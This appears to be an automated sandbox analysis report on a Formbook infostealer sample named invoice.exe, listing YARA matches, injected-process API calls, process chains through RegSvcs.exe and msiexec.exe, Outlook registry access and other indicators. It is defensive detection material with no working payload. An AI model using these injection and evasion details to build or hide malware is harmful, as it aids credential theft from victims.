Source: 0000000C.00000002.506833104.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.503273136.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.347542023.0000000010363000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: invoice.exe PID: 1784, type: MEMORYSTR	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
Source: Process Memory Space: RegSvcs.exe PID: 5440, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msiexec.exe PID: 5196, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_0256203D	0_2_0256203D
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_02563778	0_2_02563778
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_02560040	0_2_02560040
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_02562150	0_2_02562150
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04BCC38C	0_2_04BCC38C
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04BCEC20	0_2_04BCEC20
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04BCEC11	0_2_04BCEC11
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04D10700	0_2_04D10700
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04D106D0	0_2_04D106D0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_06E4D500	0_2_06E4D500
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_06E4A3B0	0_2_06E4A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE20A0	1_2_00FE20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCB090	1_2_00FCB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA830	1_2_00FDA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071002	1_2_01071002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0108E824	1_2_0108E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD99BF	1_2_00FD99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010820A8	1_2_010820A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD4120	1_2_00FD4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010828EC	1_2_010828EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBF900	1_2_00FBF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01082B28	1_2_01082B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0105CB4F	1_2_0105CB4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB236	1_2_00FDB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107DBD2	1_2_0107DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010703DA	1_2_010703DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010623E3	1_2_010623E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEABD8	1_2_00FEABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0106FA2B	1_2_0106FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEEBB0	1_2_00FEEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDEB9A	1_2_00FDEB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE138B	1_2_00FE138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010822AE	1_2_010822AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDAB40	1_2_00FDAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01082D07	1_2_01082D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01081D55	1_2_01081D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01072D82	1_2_01072D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010825DD	1_2_010825DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC841F	1_2_00FC841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCD5E0	1_2_00FCD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107D466	1_2_0107D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE2581	1_2_00FE2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB0D20	1_2_00FB0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0108DFCE	1_2_0108DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD6E30	1_2_00FD6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01081FF1	1_2_01081FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107D616	1_2_0107D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01061EB6	1_2_01061EB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01082EF7	1_2_01082EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004012A3	1_2_004012A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00422393	1_2_00422393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004044C7	1_2_004044C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040B537	1_2_0040B537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00422DC6	1_2_00422DC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00421603	1_2_00421603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004046E7	1_2_004046E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040FF77	1_2_0040FF77

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: String function: 00FBB150 appears 145 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF98F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_00FF98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_00FF9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9840 NtDelayExecution,LdrInitializeThunk,	1_2_00FF9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF99A0 NtCreateSection,LdrInitializeThunk,	1_2_00FF99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_00FF9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9A50 NtCreateFile,LdrInitializeThunk,	1_2_00FF9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9A20 NtResumeThread,LdrInitializeThunk,	1_2_00FF9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_00FF9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF95D0 NtClose,LdrInitializeThunk,	1_2_00FF95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9540 NtReadFile,LdrInitializeThunk,	1_2_00FF9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF96E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_00FF96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_00FF9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9FE0 NtCreateMutant,LdrInitializeThunk,	1_2_00FF9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF97A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_00FF97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9780 NtMapViewOfSection,LdrInitializeThunk,	1_2_00FF9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9710 NtQueryInformationToken,LdrInitializeThunk,	1_2_00FF9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF98A0 NtWriteVirtualMemory,	1_2_00FF98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FFB040 NtSuspendThread,	1_2_00FFB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9820 NtEnumerateKey,	1_2_00FF9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF99D0 NtCreateProcessEx,	1_2_00FF99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9950 NtQueueApcThread,	1_2_00FF9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9A80 NtOpenDirectoryObject,	1_2_00FF9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9A10 NtQuerySection,	1_2_00FF9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FFA3B0 NtGetContextThread,	1_2_00FFA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9B00 NtSetValueKey,	1_2_00FF9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF95F0 NtQueryInformationFile,	1_2_00FF95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9560 NtWriteFile,	1_2_00FF9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FFAD30 NtSetContextThread,	1_2_00FFAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9520 NtWaitForSingleObject,	1_2_00FF9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF96D0 NtCreateKey,	1_2_00FF96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9670 NtQueryInformationProcess,	1_2_00FF9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9650 NtQueryValueKey,	1_2_00FF9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9610 NtEnumerateValueKey,	1_2_00FF9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9770 NtSetInformationFile,	1_2_00FF9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FFA770 NtOpenThread,	1_2_00FFA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9760 NtOpenProcess,	1_2_00FF9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF9730 NtQueryVirtualMemory,	1_2_00FF9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FFA710 NtOpenProcessToken,	1_2_00FFA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041E047 NtReadFile,	1_2_0041E047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041E0C7 NtClose,	1_2_0041E0C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041E177 NtAllocateVirtualMemory,	1_2_0041E177
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004012A3 NtProtectVirtualMemory,	1_2_004012A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041DF97 NtCreateFile,	1_2_0041DF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041E041 NtReadFile,	1_2_0041E041
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041E0C1 NtClose,	1_2_0041E0C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041E1F2 NtAllocateVirtualMemory,	1_2_0041E1F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004014E9 NtProtectVirtualMemory,	1_2_004014E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041DF91 NtCreateFile,	1_2_0041DF91

Source: invoice.exe, 00000000.00000002.281343869.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQuestKingdom.dllH vs invoice.exe
Source: invoice.exe, 00000000.00000002.275461076.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs invoice.exe
Source: invoice.exe, 00000000.00000002.292853865.00000000070A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs invoice.exe
Source: invoice.exe, 00000000.00000000.238562065.00000000003FE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQho2.exe2 vs invoice.exe
Source: invoice.exe, 00000000.00000002.292486837.0000000006E50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameQuestKingdom.dllH vs invoice.exe
Source: invoice.exe, 00000000.00000002.284626176.0000000003A0A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs invoice.exe
Source: invoice.exe	Binary or memory string: OriginalFilenameQho2.exe2 vs invoice.exe

Source: C:\Windows\SysWOW64\msiexec.exe

Section loaded: sfc.dll

Jump to behavior

Source: invoice.exe	ReversingLabs: Detection: 45%
Source: invoice.exe	Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\invoice.exe

File read: C:\Users\user\Desktop\invoice.exe:Zone.Identifier

Jump to behavior

Source: invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
Source: C:\Users\user\Desktop\invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Users\user\Desktop\invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\C5G1Z47d2

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/2@3/3

Source: invoice.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\invoice.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Mutant created: \Sessions\1\BaseNamedObjects\KTFAxBBPmPSYPgCrCEKcjrLUs

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: invoice.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: msiexec.pdb source: RegSvcs.exe, 00000001.00000002.376914799.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.376985555.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: RegSvcs.exe, 00000001.00000002.376914799.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.376985555.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Qho2.pdbSHA256 source: invoice.exe
Source:	Binary string: RegSvcs.pdb, source: msiexec.exe, 0000000C.00000002.504978888.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.509860185.0000000004943000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.269129570.0000000000C5C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.276647128.0000000000DFB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.378804122.0000000004460000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.509339278.000000000471F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.376488856.00000000042C6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.507517182.0000000004600000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.269129570.0000000000C5C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.276647128.0000000000DFB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.378804122.0000000004460000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.509339278.000000000471F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.376488856.00000000042C6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.507517182.0000000004600000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: Qho2.pdb source: invoice.exe
Source:	Binary string: RegSvcs.pdb source: msiexec.exe, 0000000C.00000002.504978888.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.509860185.0000000004943000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04BC9B88 push ds; retn 5504h	0_2_04BC9D66
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04BC7757 push cs; retn 0004h	0_2_04BC7762
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04BC5990 pushad ; iretd	0_2_04BC5999
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04D1A570 pushad ; ret	0_2_04D1A579
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04D18C62 push eax; mov dword ptr [esp], ecx	0_2_04D18C74
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_04D1AEC0 push 6004D7F6h; ret	0_2_04D1AEC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0100D0D1 push ecx; ret	1_2_0100D0E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041B0C7 push esi; retf	1_2_0041B107
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0040C0B4 push ss; retf	1_2_0040C0B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041B0BD push esi; retf	1_2_0041B107
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041B10A push esi; retf	1_2_0041B107
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0041A197 pushad ; retf	1_2_0041A1A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_004212CC push eax; ret	1_2_0042131F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00418B04 push esi; ret	1_2_00418B05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00421319 push eax; ret	1_2_0042131F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00421322 push eax; ret	1_2_00421389
